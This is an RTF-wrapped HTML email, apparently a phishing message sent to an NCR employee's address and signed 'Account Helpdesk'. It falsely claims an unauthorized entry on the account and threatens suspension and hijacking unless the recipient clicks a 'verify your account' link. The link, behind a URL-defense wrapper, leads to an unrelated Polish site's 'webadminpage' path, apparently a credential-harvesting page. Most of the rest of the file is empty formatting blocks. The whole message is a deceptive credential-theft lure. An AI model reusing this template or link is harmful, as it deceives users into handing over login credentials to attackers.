{\rtf1\ansi\ansicpg1252\fromhtml1 \fbidis \deff0{\fonttbl
{\f0\fswiss\fcharset0 Arial;}
{\f1\fmodern Courier New;}
{\f2\fnil\fcharset2 Symbol;}
{\f3\fmodern\fcharset0 Courier New;}}
{\colortbl\red0\green0\blue0;\red0\green0\blue255;}
\uc1\pard\plain\deftab360 \f0\fs24 
{\*\htmltag19 <html>}
{\*\htmltag2 \par }
{\*\htmltag34 <head>}
{\*\htmltag1 \par }
{\*\htmltag41 </head>}
{\*\htmltag2 \par }
{\*\htmltag50 <body>}
{\*\htmltag16 <html>}
{\*\htmltag32 <head>}
{\*\htmltag41 </head>}
{\*\htmltag50 <body>}
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 13px" id="gmail-m_3214749011988303000gmail-yiv4398432906m_6429247384741371602m_-305726088585758818m_-1370528937709372382m_-7257466883288417295gmail-yui_3_16_0_ym19_1_1477339406867_29485">}\htmlrtf {\htmlrtf0 Dear Annmarie.Mann@ncr.com
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 13px">}\htmlrtf {\htmlrtf0 
{\*\htmltag116 <br clear="none">}\htmlrtf \line
\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 13px" id="gmail-m_3214749011988303000gmail-yiv4398432906m_6429247384741371602m_-305726088585758818m_-1370528937709372382m_-7257466883288417295gmail-yui_3_16_0_ym19_1_1477339406867_29483">}\htmlrtf {\htmlrtf0 An Unauthorized entry was detected on your account, Due to our new safety protocol.
{\*\htmltag116 <br clear="none">}\htmlrtf \line
\htmlrtf0 
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 You have to 
{\*\htmltag84 <b>}\htmlrtf {\b \htmlrtf0 
{\*\htmltag84 <a href="https://urldefense.proofpoint.com/v2/url?u=http-3A__www.modaslubna.krakow.pl_-2D_meil_webb_webadminpage.htm&amp;d=DgMFAw&amp;c=gJN2jf8AyP5Q6Np0yWY19w&amp;r=hnDvD7GvCzTMWfM-ibGzgN8hqWi4DVkQCJLAOY6-BXs&amp;m=RqDH7ANel94C-fhHdTduFpIzjOVN_3NncLJJXioNuz0&amp;s=ER5TZw4srZEMhwFIOBN3jMyItY4wGIj3E8l6EldpJto&amp;e=">}\htmlrtf {\field{\*\fldinst{HYPERLINK "https://urldefense.proofpoint.com/v2/url?u=http-3A__www.modaslubna.krakow.pl_-2D_meil_webb_webadminpage.htm&d=DgMFAw&c=gJN2jf8AyP5Q6Np0yWY19w&r=hnDvD7GvCzTMWfM-ibGzgN8hqWi4DVkQCJLAOY6-BXs&m=RqDH7ANel94C-fhHdTduFpIzjOVN_3NncLJJXioNuz0&s=ER5TZw4srZEMhwFIOBN3jMyItY4wGIj3E8l6EldpJto&e="}}{\fldrslt\cf1\ul \htmlrtf0 verify your account\htmlrtf }\htmlrtf0 \htmlrtf }\htmlrtf0 
{\*\htmltag92 </a>}
{\*\htmltag92 </b>}\htmlrtf }\htmlrtf0  to avoid suspension.
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 \htmlrtf }\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag248 </span>}
{\*\htmltag0 \par }
{\*\htmltag96 <div id="gmail-m_3214749011988303000gmail-yiv4398432906yui_3_16_0_1_1480069048009_4255">}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 13px" id="gmail-m_3214749011988303000gmail-yiv4398432906m_6429247384741371602m_-305726088585758818m_-1370528937709372382m_-7257466883288417295gmail-yui_3_16_0_ym19_1_1477339406867_29483">}\htmlrtf {\htmlrtf0 If not your E-mail account will be Hijacked by hackers.
{\*\htmltag116 <br style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; FONT-SIZE: 13px" clear="none">}\htmlrtf \line
\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 
{\*\htmltag112 <br style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; FONT-SIZE: 13px" clear="none">}\htmlrtf \par
\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 13px" id="gmail-m_3214749011988303000gmail-yiv4398432906yui_3_16_0_1_1480069048009_4677">}\htmlrtf {\htmlrtf0 Thanks.
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 13px">}\htmlrtf {\htmlrtf0 Account Helpdesk
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; FONT-SIZE: 13px; FONT-WEIGHT: bold">}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="COLOR: rgb(69,69,69)">}\htmlrtf {\htmlrtf0 
{\*\htmltag116 <br style="FONT-SIZE: 15px" clear="none">}\htmlrtf \line
\htmlrtf0 \htmlrtf }\htmlrtf0 \htmlrtf }\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag248 </span>}
{\*\htmltag248 </span>}
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
